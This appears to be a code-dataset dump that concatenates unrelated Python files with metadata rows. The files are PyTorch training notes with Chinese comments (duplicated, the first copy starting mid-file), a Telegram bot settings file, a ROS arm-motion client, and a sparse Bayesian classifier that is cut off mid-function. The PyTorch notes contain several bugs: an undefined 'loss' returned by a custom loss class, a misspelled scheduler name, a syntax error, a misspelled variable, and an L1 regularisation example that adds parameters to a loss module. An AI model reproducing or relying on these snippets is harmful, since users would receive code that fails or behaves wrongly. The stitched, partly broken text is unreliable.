# x,y = mixup_fn(x,y)
beta_distribution = torch.distributions.beta.Beta(alpha, alpha)
for images, labels in train_loader:
images, labels = images.cuda(), labels.cuda()
# Mixup images and labels.
lambda_ = beta_distribution.sample([]).item()
index = torch.randperm(images.size(0)).cuda()
mixed_images = lambda_ * images + (1 - lambda_) * images[index, :]
label_a, label_b = labels, labels[index]
# Mixup loss.
scores = model(mixed_images)
loss = (lambda_ * loss_function(scores, label_a)
+ (1 - lambda_) * loss_function(scores, label_b))
optimizer.zero_grad()
loss.backward()
optimizer.step()
#************************正则化***********************
# l1正则化
loss = nn.CrossEntropyLoss()
for param in model.parameters():
loss += torch.sum(torch.abs(param))
loss.backward()
# l2正则化,pytorch中的weight_decay相当于l2正则化
bias_list = (param for name, param in model.named_parameters() if name[-4:] == 'bias')
others_list = (param for name, param in model.named_parameters() if name[-4:] != 'bias')
parameters = [{'parameters': bias_list, 'weight_decay': 0},
{'parameters': others_list}]
optimizer = torch.optim.SGD(parameters, lr=1e-2, momentum=0.9, weight_decay=1e-4)
#*********************梯度裁剪*************************#
torch.nn.utils.clip_grad_norm_(model.parameters(),max_norm=20)
#********************得到当前学习率*********************#
# If there is one global learning rate (which is the common case).
lr = next(iter(optimizer.param_groups))['lr']
# If there are multiple learning rates for different layers.
all_lr = []
for param_group in optimizer.param_groups:
all_lr.append(param_group['lr'])
#在一个batch训练代码中,当前的lr是optimzer.param_groups[0]['lr']
#**********************学习率衰减************************#
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateaue(optimizer,mode='max',patience=5,verbose=True)
for epoch in range(num_epochs):
train_one_epoch(...)
val(...)
scheduler.step(val_acc)
# Cosine annealing learning rate
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer=,T_max=80)
# Redule learning rate by 10 at given epochs
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,milestones=[50,70],gamma=0.1)
for t in range(0,80):
scheduler.step()
train(...)
val(...)
# learning rate warmup by 10 epochs
# torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda, last_epoch=-1, verbose=False)
# 设置学习率为初始学习率乘以给定lr_lambda函数的值,lr_lambda一般输入为当前epoch
# https://blog.csdn.net/ltochange/article/details/116524264
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer,lr_lambda=lambda t: t/10)
for t in range(0,10):
scheduler.step()
train(...)
val(...)
#**********************优化器链式更新******************************#
# 从pytorch1.4版本开始,torch.optim.lr_scheduler支持链式更新(chaining),即用户可以定义两个schedulers,并在训练过程中交替使用
import torch
from torch.optim import SGD
from torch.optim.lr_scheduler import ExponentialLR,StepLR
model = [torch.nn.Parameter(torch.randn(2,2,requires_grad=True))]
optimizer = SGD(model,0.1)
scheduler1 = ExponentialLR(optimizer,gamma=0.9)
scheduler2 = StepLR(optimizer,step_size=3,gamma=0.1)
for epoch in range(4):
print(ecoch,scheduler2.get_last_lr()[0])
print(epoch,scheduler1.get_last_lr()[0])
optimizer.step()
scheduler1.step()
scheduler2.step()
#********************模型训练可视化*******************************#
# pytorch可以使用tensorboard来可视化训练过程
# pip install tensorboard
# tensorboard --logdir=runs
# 使用SummaryWriter类来收集和可视化相应的数据,为了方便查看,可以使用不同的文件夹,比如'loss/train'和'loss/test'
from torch.utils.tensorboard import SummaryWriter
import numpy as np
writer = SummaryWriter()
for n_iter in range(100):
writer.add_scalar('loss/train',np.random.random(),n_iter)
writer.add_scalar('loss/test',np.random.random(),n_iter)
writer.add_scalar('Accuracy/train',np.random.random(),n_iter)
writer.add_scalar('Accuracy/test',np.random.random(),n_iter)
#********************保存和加载检查点****************************#
start_epoch = 0
# Load checkpoint.
if resume: # resume为参数,第一次训练时设为0,中断再训练时设为1
model_path = os.path.join('model', 'best_checkpoint.pth.tar')
assert os.path.isfile(model_path)
checkpoint = torch.load(model_path)
best_acc = checkpoint['best_acc']
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
print('Load checkpoint at epoch {}.'.format(start_epoch))
print('Best accuracy so far {}.'.format(best_acc))
# Train the model
for epoch in range(start_epoch, num_epochs):
...
# Test the model
...
# save checkpoint
is_best = current_acc > best_acc
best_acc = max(current_acc, best_acc)
checkpoint = {
'best_acc': best_acc,
'epoch': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
model_path = os.path.join('model', 'checkpoint.pth.tar')
best_model_path = os.path.join('model', 'best_checkpoint.pth.tar')
torch.save(checkpoint, model_path)
if is_best:
shutil.copy(model_path, best_model_path)
| 34.553797 | 111 | 0.637513 | import torch
import torch.nn as nn
import numpy as np
#********************模型训练*******************************#
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(),lr=learning_rate)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = model.to(device)
for epoch in range(train_epochs):
for i,(images,labels) in enumerate(train_loader):
images = images.cuda()
labels = labels.cuda()
outs = model(images)
loss = criterion(outs,labels)
# 根据pytorch中backward()函数的计算,
# 当网络参量进行反馈时,梯度是累积计算而不是被替换,
# 但在处理每一个batch时并不需要与其他batch的梯度混合起来累积计算,
# 因此需要对每个batch调用一遍zero_grad()将参数梯度置0.
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch:{epoch},Loss:{loss.item()}...')
#********************模型测试************************#
model.eval() #对于bn和drop_out 起作用
with torch.no_grad():
correct = 0
total = 0
for images,labels in test_loader:
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
pred = torch.argmax(outputs,1).item()
correct+= (torch.argmax(outputs,1)==labels).sum().cpu().data.numpy()
total += len(images)
print(f'acc:{correct/total:.3f}')
#****************自定义loss*************************#
class MyLoss(nn.Module):
def __init__(self):
super(MyLoss,self).__init__()
def forward(self,x,y):
looss = torch.mean((x-y)**2)
return loss
#***************标签平滑,有很强的聚类效果???****************************#
# https://zhuanlan.zhihu.com/p/302843504 label smoothing 分析
# 写一个label_smoothing.py 的文件,然后再训练代码里面引用,用LSR代替交叉熵损失即可
import torch
import torch.nn as nn
# timm 库中有现成的接口
# PyTorchImageModels
# from timm.loss import LabelSmoothingCrossEntrophy
# from timm.loss import SoftTargetCrossEntrophy
# criterion = LabelSmoothingCrossEntrophy(smoothing=config.MODEL.LABEL_SMOOTHING)
# criterion = SoftTargetCrossEntrophy()
class LSR(nn.Module):
def __init__(self,e=0.1,reduction='mean'):
super(LSR,self).__init__()
self.log_softmax = nn.LogSoftmax(dim=1)
self.e = e
self.reduction = reduction
def _one_hot(self,labels,classes,value=1):
'''
Convert labels to one hot vectors
Args:
labels: torch tensor in format [label1,label2,label3,...]
classes: int,number of classes
value: label value in one hot vector,default to 1
Returns:
return one hot format labels in shape [batchsize,classes]
'''
one_hot = torch.zeros(labels.size(0),classes)
# labels and value_added size must match
labels = labels.view(labels.size(0),-1)
value_added = torch.Tensor(labels.size(0),1).fill_(value)
value_added = value_added.to(labels.device)
one_hot = one_hot.to(labels.device)
one_hot.scatter_add_(1,labels,value_added)
# scatter_add_(dim, index_tensor, other_tensor)
# 将other_tensor中的数据,按照index_tensor中的索引位置,添加至one_hot中
return one_hot
def _smooth_label(self,target,length,smooth_factor):
'''
Convert targets to one hot vector and smooth them
eg:
[1,0,0,0,0,0]->[0.9,0.02,0.02,0.02,0.02,0.02]
Args:
target: target in format[label1,label2,label3,...,label_batchsize]
length: length of one-hot format(number of classes)
smooth_factor: smooth factor for label smooth
Returns:
smoothed labels in one hot format
'''
one_hot = self._one_hot(target,length,value=1-smooth_factor)
one_hot += smooth_factor/(length-1)
return one_hot.to(target.device)
def forward(self,x,target):# x,网络分类结果,shape=[B,num_classes]
if x.size(0)!=target.size(0):
raise ValueError(f'Expected input batchsize{x.size(0)} to match target batchsize {target.size(0)}')
if x.dim()!=2:
raise ValueError(f'Expected input tensor to have 2 dimensions,got {x.dim()}')
smoothed_target = self._smooth_label(target,x.size(1),self.e)
x = self.log_softmax(x)
loss = torch.sum(-x*smoothed_target,dim=1)
if self.reduction == 'None':
return loss
elif self.reduction == 'sum':
return torch.sum(loss)
elif self.reduction == 'mean':
return torch.mean(loss)
else:
raise ValueError('Unrecongnized option,expect reduction to be one of none,mean,sum')
# 或者直接再训练过程中进行标签平滑
for images, labels in train_loader:
images, labels = images.cuda(), labels.cuda()
N = labels.size(0)
# C is the number of classes.
smoothed_labels = torch.full(size=(N, C), fill_value=0.1 / (C - 1)).cuda()
smoothed_labels.scatter_(dim=1, index=torch.unsqueeze(labels, dim=1), value=0.9)
score = model(images)
log_prob = torch.nn.functional.log_softmax(score, dim=1)
loss = -torch.sum(log_prob * smoothed_labels) / N
optimizer.zero_grad()
loss.backward()
optimizer.step()
#******************************Mixup训练,数据增强的一种方式***********************************#
# mixup采用对不同类别之间进行建模的方式实现数据增强,而通用数据增强方法则是针对同一类做变换。(经验风险最小->邻域风险最小),提升对抗样本及噪声样本的鲁棒性
# 思路非常简单:
# 从训练样本中随机抽取两个样本进行简单的随机加权求和,对于标签,相当于加权后的样本有两个label
# 求loss的时候,对两个label的loss进行加权,在反向求导更新参数。
# https://zhuanlan.zhihu.com/p/345224408
# distributions包含可参数化的概率分布和采样函数
# timm库有现成接口
# from timm.data import Mixup
# mixup_fn = Mixup(
# mixup_alpha=0.8,
# cutmix_alpha=1.0,
# cutmix_minmax=None,
# prob=1.0,
# switch_prob=0.5,
# mode='batch',
# label_smoothing=0.1,
# num_classes=1000)
# x,y = mixup_fn(x,y)
beta_distribution = torch.distributions.beta.Beta(alpha, alpha)
for images, labels in train_loader:
images, labels = images.cuda(), labels.cuda()
# Mixup images and labels.
lambda_ = beta_distribution.sample([]).item()
index = torch.randperm(images.size(0)).cuda()
mixed_images = lambda_ * images + (1 - lambda_) * images[index, :]
label_a, label_b = labels, labels[index]
# Mixup loss.
scores = model(mixed_images)
loss = (lambda_ * loss_function(scores, label_a)
+ (1 - lambda_) * loss_function(scores, label_b))
optimizer.zero_grad()
loss.backward()
optimizer.step()
#************************正则化***********************
# l1正则化
loss = nn.CrossEntropyLoss()
for param in model.parameters():
loss += torch.sum(torch.abs(param))
loss.backward()
# l2正则化,pytorch中的weight_decay相当于l2正则化
bias_list = (param for name, param in model.named_parameters() if name[-4:] == 'bias')
others_list = (param for name, param in model.named_parameters() if name[-4:] != 'bias')
parameters = [{'parameters': bias_list, 'weight_decay': 0},
{'parameters': others_list}]
optimizer = torch.optim.SGD(parameters, lr=1e-2, momentum=0.9, weight_decay=1e-4)
#*********************梯度裁剪*************************#
torch.nn.utils.clip_grad_norm_(model.parameters(),max_norm=20)
#********************得到当前学习率*********************#
# If there is one global learning rate (which is the common case).
lr = next(iter(optimizer.param_groups))['lr']
# If there are multiple learning rates for different layers.
all_lr = []
for param_group in optimizer.param_groups:
all_lr.append(param_group['lr'])
#在一个batch训练代码中,当前的lr是optimzer.param_groups[0]['lr']
#**********************学习率衰减************************#
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateaue(optimizer,mode='max',patience=5,verbose=True)
for epoch in range(num_epochs):
train_one_epoch(...)
val(...)
scheduler.step(val_acc)
# Cosine annealing learning rate
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer=,T_max=80)
# Redule learning rate by 10 at given epochs
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,milestones=[50,70],gamma=0.1)
for t in range(0,80):
scheduler.step()
train(...)
val(...)
# learning rate warmup by 10 epochs
# torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda, last_epoch=-1, verbose=False)
# 设置学习率为初始学习率乘以给定lr_lambda函数的值,lr_lambda一般输入为当前epoch
# https://blog.csdn.net/ltochange/article/details/116524264
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer,lr_lambda=lambda t: t/10)
for t in range(0,10):
scheduler.step()
train(...)
val(...)
#**********************优化器链式更新******************************#
# 从pytorch1.4版本开始,torch.optim.lr_scheduler支持链式更新(chaining),即用户可以定义两个schedulers,并在训练过程中交替使用
import torch
from torch.optim import SGD
from torch.optim.lr_scheduler import ExponentialLR,StepLR
model = [torch.nn.Parameter(torch.randn(2,2,requires_grad=True))]
optimizer = SGD(model,0.1)
scheduler1 = ExponentialLR(optimizer,gamma=0.9)
scheduler2 = StepLR(optimizer,step_size=3,gamma=0.1)
for epoch in range(4):
print(ecoch,scheduler2.get_last_lr()[0])
print(epoch,scheduler1.get_last_lr()[0])
optimizer.step()
scheduler1.step()
scheduler2.step()
#********************模型训练可视化*******************************#
# pytorch可以使用tensorboard来可视化训练过程
# pip install tensorboard
# tensorboard --logdir=runs
# 使用SummaryWriter类来收集和可视化相应的数据,为了方便查看,可以使用不同的文件夹,比如'loss/train'和'loss/test'
from torch.utils.tensorboard import SummaryWriter
import numpy as np
writer = SummaryWriter()
for n_iter in range(100):
writer.add_scalar('loss/train',np.random.random(),n_iter)
writer.add_scalar('loss/test',np.random.random(),n_iter)
writer.add_scalar('Accuracy/train',np.random.random(),n_iter)
writer.add_scalar('Accuracy/test',np.random.random(),n_iter)
#********************保存和加载检查点****************************#
start_epoch = 0
# Load checkpoint.
if resume: # resume为参数,第一次训练时设为0,中断再训练时设为1
model_path = os.path.join('model', 'best_checkpoint.pth.tar')
assert os.path.isfile(model_path)
checkpoint = torch.load(model_path)
best_acc = checkpoint['best_acc']
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
print('Load checkpoint at epoch {}.'.format(start_epoch))
print('Best accuracy so far {}.'.format(best_acc))
# Train the model
for epoch in range(start_epoch, num_epochs):
...
# Test the model
...
# save checkpoint
is_best = current_acc > best_acc
best_acc = max(current_acc, best_acc)
checkpoint = {
'best_acc': best_acc,
'epoch': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
model_path = os.path.join('model', 'checkpoint.pth.tar')
best_model_path = os.path.join('model', 'best_checkpoint.pth.tar')
torch.save(checkpoint, model_path)
if is_best:
shutil.copy(model_path, best_model_path)
| 1,040 | 1,682 | 96 |
a2feaa66fb720cdce480b8608dce5a48d06ecb63 | 343 | py | Python | settings.py | AbduazizZiyodov/google-it | 04ead41ebf99991a53816d3a3436bc18200534d9 | [
"MIT"
] | 5 | 2021-07-20T05:53:19.000Z | 2022-01-08T16:39:36.000Z | settings.py | AbduazizZiyodov/google-it | 04ead41ebf99991a53816d3a3436bc18200534d9 | [
"MIT"
] | null | null | null | settings.py | AbduazizZiyodov/google-it | 04ead41ebf99991a53816d3a3436bc18200534d9 | [
"MIT"
] | null | null | null | from os import getenv
from dotenv import load_dotenv
load_dotenv()
BOT_TOKEN = getenv("TELEGRAM_API_TOKEN")
GROUP_CHAT_ID = getenv("GROUP_CHAT_ID")
CHANNEL_NAME = getenv("CHANNEL_NAME")
SUPER_USER_ID = getenv("SUPER_USER_ID") # sudo :)
GOOGLE_API_KEY = getenv('GOOGLE_API_KEY')
CSE_ID = getenv('CSE_ID')
SENTRY_DSN = getenv("SENTRY_SDK") | 22.866667 | 50 | 0.772595 | from os import getenv
from dotenv import load_dotenv
load_dotenv()
BOT_TOKEN = getenv("TELEGRAM_API_TOKEN")
GROUP_CHAT_ID = getenv("GROUP_CHAT_ID")
CHANNEL_NAME = getenv("CHANNEL_NAME")
SUPER_USER_ID = getenv("SUPER_USER_ID") # sudo :)
GOOGLE_API_KEY = getenv('GOOGLE_API_KEY')
CSE_ID = getenv('CSE_ID')
SENTRY_DSN = getenv("SENTRY_SDK") | 0 | 0 | 0 |
43c16e1db9a20e1ecc8fe01ebda719c66c84cf46 | 1,514 | py | Python | scripts/move_client.py | stefanyangwang/mycobot_320_moveit | 95912336e921c48b8da37c1a6bd7db30fec0f1db | [
"BSD-2-Clause"
] | null | null | null | scripts/move_client.py | stefanyangwang/mycobot_320_moveit | 95912336e921c48b8da37c1a6bd7db30fec0f1db | [
"BSD-2-Clause"
] | null | null | null | scripts/move_client.py | stefanyangwang/mycobot_320_moveit | 95912336e921c48b8da37c1a6bd7db30fec0f1db | [
"BSD-2-Clause"
] | 1 | 2022-02-12T20:17:28.000Z | 2022-02-12T20:17:28.000Z | #!/usr/bin/env python
import rospy
import actionlib
from mycobot_320_moveit.msg import *
if __name__ == '__main__':
rospy.init_node('move_client')
result = move_client()
print(result) | 33.644444 | 66 | 0.693527 | #!/usr/bin/env python
import rospy
import actionlib
from mycobot_320_moveit.msg import *
def move_client():
client = actionlib.SimpleActionClient('move', MultiMoveAction)
print("Waiting for the move server ...")
client.wait_for_server()
print("\n --- Server ready --- \n")
goal = MultiMoveGoal()
approach_goal = robot_goals()
approach_goal.x = 0.25409088624289733
approach_goal.y = -0.03248359876201828
approach_goal.z = 0.11967745058037846
approach_goal.ox = 0.3852122476586819
approach_goal.oy = 0.5951954753491578
approach_goal.oz = -0.3842176257717917
approach_goal.ow = 0.5913803229935233
goal.targetPosition.append(approach_goal)
target_goal = robot_goals()
target_goal.x = 0.2539028024599151
target_goal.y = -0.0322778144393383
target_goal.z = 0.06967822781338817
target_goal.ox = 0.3852122476586819
target_goal.oy = 0.5951954753491578
target_goal.oz = -0.3842176257717917
target_goal.ow = 0.5913803229935233
goal.targetPosition.append(target_goal)
client.send_goal(goal)
client_state = client.get_state()
while client_state != 3: # not in [2,3,4,5,8]
client_state = client.get_state()
# ABORTED : 4
if client_state == 4:
return 'target_not_reached'
print(client_state)
print('--- Movement completed ---')
return 'target_reached'
if __name__ == '__main__':
rospy.init_node('move_client')
result = move_client()
print(result) | 1,279 | 0 | 23 |
fc74b9577e20bcc629403331623bb4ddb894d484 | 40,036 | py | Python | OLSS/rcv1/ParamChoice/sep_tune.py | zsdlightning/OLSS | 7fc5d8621adfcaab61defb61719b82aeb05cc1b3 | [
"MIT"
] | 1 | 2018-06-29T10:02:29.000Z | 2018-06-29T10:02:29.000Z | OLSS/rcv1/ParamChoice/sep_tune.py | zsdlightning/OLSS | 7fc5d8621adfcaab61defb61719b82aeb05cc1b3 | [
"MIT"
] | null | null | null | OLSS/rcv1/ParamChoice/sep_tune.py | zsdlightning/OLSS | 7fc5d8621adfcaab61defb61719b82aeb05cc1b3 | [
"MIT"
] | null | null | null | #!/bin/python
import os
import sys
import time
import numpy as np
import scipy as sp
from scipy.stats import norm as normal
from scipy.special import *
from scipy.linalg import block_diag
from scipy.sparse import csr_matrix
import scipy.linalg as linalg
from sklearn import metrics
import random
'''
This version deals with sparse features, VW format
'''
feature_off = 3
#d: dimension, rho: selection prior
# normal_PDF / normal_CDF
#batch training
#note, n is an array
#calculate the appearche of each features in the training data, used for the step-size of each approx. factor
#this version is the same as train_stochastic_multi_rate, except that at the beining, I will update all the prior factors
#this version keeps average likelihood for pos. and neg. samples separately, and also use n_pos and n_neg to update the full posterior
#enforce the same step-size
#this reads data from HDFS and keeps read the negative samples until it reaches the same amount with the postive samples
#then pass once
#in theory, go 1000 pass can process all 7 days' data, 150 iteraions can process 1day's data
#SEP training
#calculate the appearche of each features in the training data, for postive and negative samples
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'usage %s <tau0>'%sys.argv[0]
sys.exit(1)
np.random.seed(0)
tune_rcv1(float(sys.argv[1]))
| 46.499419 | 183 | 0.496054 | #!/bin/python
import os
import sys
import time
import numpy as np
import scipy as sp
from scipy.stats import norm as normal
from scipy.special import *
from scipy.linalg import block_diag
from scipy.sparse import csr_matrix
import scipy.linalg as linalg
from sklearn import metrics
import random
'''
This version deals with sparse features, VW format
'''
feature_off = 3
def vec(a):
return a.reshape([a.size,1])
def normalize(val, mean_std):
return (val - mean_std[0])/mean_std[1]
class EPSS:
#d: dimension, rho: selection prior
def __init__(self, d, rho0 = 0.5, n_epoch = 1, mini_batch = 1, tol = 1e-5, damping = 0.9, tau0 = 1.0):
#Bernoli prior for selection variables
self.rho = logit(rho0)
self.tol = tol
self.damping = damping
self.tau0 = tau0
self.INF = 1e6
self.mini_batch = mini_batch
self.n_epoch = n_epoch
# normal_PDF / normal_CDF
def pdf_over_cdf(self, input):
#return normal.pdf(input)/normal.cdf(input)
return np.exp( normal.logpdf(input) - normal.logcdf(input) )
#batch training
def train(self, X, y, intercept = False):
if intercept:
X = np.hstack([X, np.ones(X.shape[0]).reshape([X.shape[0],1])])
self.init(X,y)
n,d = X.shape
X2 = X*X
Y = np.tile(vec(y), [1,d])
for it in xrange(self.max_iter):
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
#likelihood terms (future version should have go through one by one rather than parallel)
v = np.tile(self.v, [n,1])
mu = np.tile(self.mu, [n, 1])
v_inv_not = 1.0/v - 1.0/self.v_l
v_not = 1.0/v_inv_not
mu_not = v_not * (mu/v - self.mu_l/self.v_l)
t1 = y * np.sum(mu_not * X, 1)
t2 = np.sqrt(np.sum(v_not*X2 + 1.0, 1))
t3 = self.pdf_over_cdf(t1/t2)/t2
dmu_not = np.tile(vec(t3*y), [1, d]) * X
dv_not = np.tile(vec(-0.5*t3*t1/(t2*t2)), [1,d]) * X2
mu = mu_not + v_not * dmu_not
v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
#updated likelihood terms
v_l_inv = 1/v - 1/v_not
v_l_inv[ v_l_inv <= 0] = 1/self.INF
v_l = 1.0/v_l_inv
#damping
v_l_inv = self.damping * 1.0/v_l + (1 - self.damping) * 1.0/self.v_l
v_l_inv_mu = self.damping * ( mu/v - mu_not/v_not ) + (1 - self.damping) * self.mu_l/self.v_l
self.v_l = 1/v_l_inv
self.mu_l = self.v_l * v_l_inv_mu
#update global terms
v_inv_all = np.sum(1/self.v_l, 0) + 1/self.v_p
v_inv_mu = np.sum(self.mu_l/self.v_l, 0) + self.mu_p/self.v_p
self.v = 1/v_inv_all
self.mu = self.v * v_inv_mu
#update prior terms
v_inv_not = 1/self.v - 1/self.v_p
v_not = 1/v_inv_not
mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
v_tilt = 1/(1/v_not + 1/self.tau0)
mu_tilt = v_tilt * (mu_not/v_not)
#log N(0 | mu_not, v_not + tau0)
log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
#log N(0 | mu_not, v_not)
log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
rho_p = log_h - log_g
sel_prob = expit(self.rho + rho_p)
mu = sel_prob * mu_tilt
v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
#damping
self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
v_p_inv = 1/v - v_inv_not
v_p_inv[ v_p_inv <= 0] = 1/self.INF
v_p_inv_mu = mu/v - mu_not/v_not
v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
self.v_p = 1/v_p_inv
self.mu_p = self.v_p * v_p_inv_mu
#update global approx. dist.
self.r = self.rho_p + self.rho
v_inv_all = np.sum(1/self.v_l, 0) + 1/self.v_p
v_inv_mu = np.sum(self.mu_l/self.v_l, 0) + self.mu_p/self.v_p
self.v = 1/v_inv_all
self.mu = self.v * v_inv_mu
#difference only on global approxiations
diff = np.sqrt(np.sum((1/old_v - v_inv_all)**2) + np.sum((old_mu - self.mu)**2) + np.sum((old_r - self.r)**2))/(old_v.size + old_mu.size + old_r.size)
print 'iter %d, diff = %g'%(it, diff)
if diff < self.tol:
break
#note, n is an array
def init_sep(self, n, d, damping_strategy = None , non_informative = True):
if non_informative:
#prior factors
self.rho_p = np.zeros(d)
self.mu_p = np.zeros(d)
self.v_p = self.INF*np.ones(d)
#average likelihood factors -- only for w
self.mu_l = np.zeros(d)
self.v_l = self.INF * np.ones(d)
#global posterior parameters
self.r = self.rho_p + self.rho
self.mu = np.zeros(d)
self.v = 1/(1.0/self.v_p + 1.0/self.v_l * n)
#calculate the appearche of each features in the training data, used for the step-size of each approx. factor
def calc_feature_appearence(self, d, fea2id, training_file):
#including intercept
res = np.zeros(d+1)
with open(training_file, 'r') as f:
ct = 0
for line in f:
ct = ct + 1
items = line.strip().split(' ')
res[ d ] = res[ d ] + 1
for item in items[3:]:
name = item.split(':')[0]
id = fea2id[name]
res[ id ] = res[ id ] + 1
if ct%10000 == 0:
print ct
np.save('feature_appearence.npy',res)
return res
#this version is the same as train_stochastic_multi_rate, except that at the beining, I will update all the prior factors
def train_stochastic_multi_rate(self, d, n_pos, n_neg, training_file, fea2id, fea2stats, Xtest, ytest, logger, n_batch_update_prior = 1, intercept = False, damping_both = True):
#initialization
#separate average likelihood for pos. & neg. samples
d = d + 1
self.INF = 1e6
self.rho_p = np.zeros(d)
self.mu_p = np.zeros(d)
self.v_p = self.INF*np.ones(d)
self.mu_l_pos = np.zeros(d)
self.v_l_pos = self.INF * np.ones(d)
self.mu_l_neg = np.zeros(d)
self.v_l_neg = self.INF * np.ones(d)
#global posterior parameters
self.r = self.rho_p + self.rho
self.mu = np.zeros(d)
self.v = 1.0/(1.0/self.v_p + n_pos*1.0/self.v_l_pos + n_neg*1.0/self.v_l_neg)
old_v = self.v.copy()
old_mu = self.mu.copy()
old_r = self.r.copy()
it = 0
curr = 0
count = 0
n_batch_pos = np.zeros(d)
n_batch_neg = np.zeros(d)
v_l_inv_batch_pos = np.zeros(d)
v_l_inv_batch_neg = np.zeros(d)
v_l_inv_mu_batch_pos = np.zeros(d)
v_l_inv_mu_batch_neg = np.zeros(d)
#first, update prior factors
v_inv_not = 1/self.v - 1/self.v_p
v_not = 1/v_inv_not
mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
v_tilt = 1/(1/v_not + 1/self.tau0)
mu_tilt = v_tilt * (mu_not/v_not)
#log N(0 | mu_not, v_not + tau0)
log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
#log N(0 | mu_not, v_not)
log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
rho_p = log_h - log_g
sel_prob = expit(self.rho + rho_p)
mu = sel_prob * mu_tilt
v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
#damping
self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
v_p_inv = 1/v - v_inv_not
v_p_inv[ v_p_inv <= 0] = 1/self.INF
v_p_inv_mu = mu/v - mu_not/v_not
v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
self.v_p = 1/v_p_inv
self.mu_p = self.v_p * v_p_inv_mu
#update global approx. dist.
self.r = self.rho_p + self.rho
v_inv_all = v_inv_not + 1.0/self.v_p
v_inv_mu = mu_not/v_not + self.mu_p/self.v_p
self.v = 1.0/v_inv_all
self.mu = self.v * v_inv_mu
#for updating prior factors
accumulate_ind = []
start_time = time.clock()
while it < self.n_epoch:
with open(training_file, 'r') as f:
for line in f:
count = count + 1
#extract feature values
items = line.strip().split(' ')
id = []
val = []
for item in items[feature_off:]:
key_val = item.split(':')
id.append(fea2id[key_val[0]])
if len(key_val) == 1:
val.append(1.0)
else:
val.append( float(key_val[1]) )
#val.append( normalize(float(key_val[1]), fea2stats[ key_val[0] ]) )
#intercept
id.append(d-1)
val.append(1.0)
#moment matching
xbatch = np.array(val)
xbatch2 = xbatch**2
ybatch = int(items[0])
if ybatch == 1:
#cavity dist. q^{-1}, the same for each batch-sample
v_inv_not = 1.0/self.v[id] - 1.0/self.v_l_pos[id]
v_not = 1.0/v_inv_not
mu_not = v_not * (self.mu[id]/self.v[id] - self.mu_l_pos[id]/self.v_l_pos[id])
t1 = ybatch * np.sum(mu_not * xbatch)
t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0))
t3 = self.pdf_over_cdf(t1/t2)/t2
dmu_not = (t3*ybatch) * xbatch
dv_not = (-0.5*t3*t1/(t2*t2)) * xbatch2
mu = mu_not + v_not * dmu_not
v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
#obtain new batch likelihood approx.
v_l_inv = 1/v - 1/v_not
v_l_inv[ v_l_inv <= 0] = 1/self.INF
v_l_inv_mu = mu/v - mu_not/v_not
if damping_both:
v_l_inv = self.damping * v_l_inv + (1.0 - self.damping) * 1.0/self.v_l_pos[id]
v_l_inv_mu = self.damping * v_l_inv_mu + (1.0 - self.damping) * self.mu_l_pos[id]/self.v_l_pos[id]
n_batch_pos[id] += 1.0
v_l_inv_batch_pos[id] += v_l_inv
v_l_inv_mu_batch_pos[id] += v_l_inv_mu
else:
#cavity dist. q^{-1}, the same for each batch-sample
v_inv_not = 1.0/self.v[id] - 1.0/self.v_l_neg[id]
v_not = 1.0/v_inv_not
mu_not = v_not * (self.mu[id]/self.v[id] - self.mu_l_neg[id]/self.v_l_neg[id])
t1 = ybatch * np.sum(mu_not * xbatch)
t2 = np.sqrt(np.sum(v_not*xbatch2 + 1.0))
t3 = self.pdf_over_cdf(t1/t2)/t2
dmu_not = (t3*ybatch) * xbatch
dv_not = (-0.5*t3*t1/(t2*t2)) * xbatch2
mu = mu_not + v_not * dmu_not
v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
#obtain new batch likelihood approx.
v_l_inv = 1/v - 1/v_not
v_l_inv[ v_l_inv <= 0] = 1/self.INF
v_l_inv_mu = mu/v - mu_not/v_not
if damping_both:
v_l_inv = self.damping * v_l_inv + (1.0 - self.damping) * 1.0/self.v_l_neg[id]
v_l_inv_mu = self.damping * v_l_inv_mu + (1.0 - self.damping) * self.mu_l_neg[id]/self.v_l_neg[id]
n_batch_neg[id] += 1.0
v_l_inv_batch_neg[id] += v_l_inv
v_l_inv_mu_batch_neg[id] += v_l_inv_mu
curr = curr + 1
#print 'batch %d'%curr
if count == self.mini_batch:
#stochastic update
ind = np.nonzero(n_batch_pos)
